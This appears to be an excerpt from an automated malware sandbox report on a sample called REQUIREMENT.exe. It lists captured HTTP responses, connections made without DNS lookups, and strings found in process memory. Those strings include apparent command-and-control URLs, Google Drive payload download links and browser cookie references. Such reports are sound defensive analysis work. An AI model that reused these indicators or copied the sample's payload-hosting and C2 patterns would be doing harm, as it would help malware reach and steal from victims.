Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:53:16 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:21 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:21 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:26 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:28 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.7Date: Wed, 13 Oct 2021 13:54:40 GMTContent-Length: 0Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: systray.exe, 0000000D.00000002.37540180980.00000000054BC000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190974441.00000000281F2000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: systray.exe, 0000000D.00000002.37540180980.00000000054BC000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190974441.00000000281F2000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: systray.exe, 0000000D.00000002.37540180980.00000000054BC000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190974441.00000000281F2000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)

Source: REQUIREMENT.exe, 00000003.00000003.32856917078.00000000009AD000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: REQUIREMENT.exe, 00000003.00000003.32856917078.00000000009AD000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32984707451.000000000DAE0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000009.00000000.32882465556.000000000D5C5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000009.00000000.33236468939.000000000A470000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35639235210.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: systray.exe, 0000000D.00000002.37540352224.00000000056AB000.00000004.00020000.sdmp	String found in binary or memory: http://www.shopsharpgraphics.com
Source: systray.exe, 0000000D.00000002.37540352224.00000000056AB000.00000004.00020000.sdmp	String found in binary or memory: http://www.shopsharpgraphics.com/cogu/
Source: systray.exe, 0000000D.00000002.37539627318.0000000004FB1000.00000004.00020000.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com
Source: systray.exe, 0000000D.00000002.37539627318.0000000004FB1000.00000004.00020000.sdmp, systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/6
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/L
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	String found in binary or memory: http://www.thousandoaks-buickgmc.com/cogu/W
Source: explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.32935207823.000000000DA12000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32981600258.000000000D73F000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000009.00000000.32912002579.0000000003840000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.32960963576.00000000038A0000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35629055759.00000000008C3000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000003.35765451123.00000000008F4000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: certmgr3ff.exe, 0000001A.00000003.35641309479.00000000008A9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/%%doc-04-7g-docs.googleusercontent.com
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/3
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/S
Source: REQUIREMENT.exe, 00000003.00000003.32857517475.0000000000997000.00000004.00000001.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/W
Source: REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	String found in binary or memory: https://doc-04-7g-docs.googleusercontent.com/t
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000003.35770188314.00000000008F4000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35818787239.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/
Source: certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/%%doc-0o-60-docs.googleusercontent.com
Source: certmgr3ff.exe, 0000001B.00000002.35778164393.000000000088A000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001C.00000002.35818787239.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/-
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/b
Source: certmgr3ff.exe, 0000001A.00000003.35628787904.00000000008B5000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/docs/secure
Source: certmgr3ff.exe, 0000001B.00000003.35765451123.00000000008F4000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcj
Source: certmgr3ff.exe, 0000001B.00000003.35770188314.00000000008F4000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0o-60-docs.googleusercontent.com/uT
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/
Source: certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/Gql
Source: certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/com_q
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/k
Source: certmgr3ff.exe, 0000001A.00000003.35633000839.00000000008C3000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleuserco
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/osoft
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/cA
Source: certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/ertificates
Source: certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/f
